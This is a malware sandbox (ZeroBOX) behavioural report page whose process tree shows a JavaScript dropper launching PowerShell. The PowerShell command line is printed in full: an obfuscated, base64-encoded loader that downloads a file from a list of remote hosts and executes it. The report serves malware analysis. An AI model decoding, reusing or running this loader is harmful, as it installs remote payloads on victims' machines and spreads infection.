popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\GuessableInapti.js

    3044

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates

      1228

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="

        240

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf